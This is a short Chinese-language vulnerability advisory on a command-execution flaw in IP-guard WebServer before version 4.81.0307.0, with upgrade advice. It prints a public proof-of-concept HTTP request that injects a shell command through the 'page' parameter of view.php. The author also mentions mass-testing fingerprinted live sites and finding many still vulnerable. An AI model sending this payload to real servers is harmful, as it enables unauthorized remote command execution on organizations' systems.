及时修复 IP-guard WebServer RCE漏洞

0x00 漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

0x01 危害等级类型

• 高危
• 命令执行

0x02 影响版本及编号

•  IP-guard < 4.81.0307.0
  

0x03 漏洞复现&poc.yaml批量

来自网络已公开的poc：
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123456+>1.txt HTTP/1.1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
通过指纹抓取到部分站点进行测试，编写yaml进行测试一下任存在大量漏洞。


漏洞验证

0x04 修复建议
官方已发布新版本修复了该漏洞，请受影响的用户升级前请将资料备份，并进行充分测试到安全版本：（https://www.ip-guard.net/）或联系官方售后支持获取版本升级安装包或补丁，升级至4.81.0307.0版本及以上
关注及时推送最新安全威胁资讯！
「由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责，EXP 与 POC 仅仅只供对已授权的目标使用测试，对未授权目标的测试本文库不承担责任，均由本人自行承担。本文库中的漏洞均为公开的漏洞收集，若文库中的漏洞出现敏感内容产生了部分影响，请及时联系作者删除漏洞。」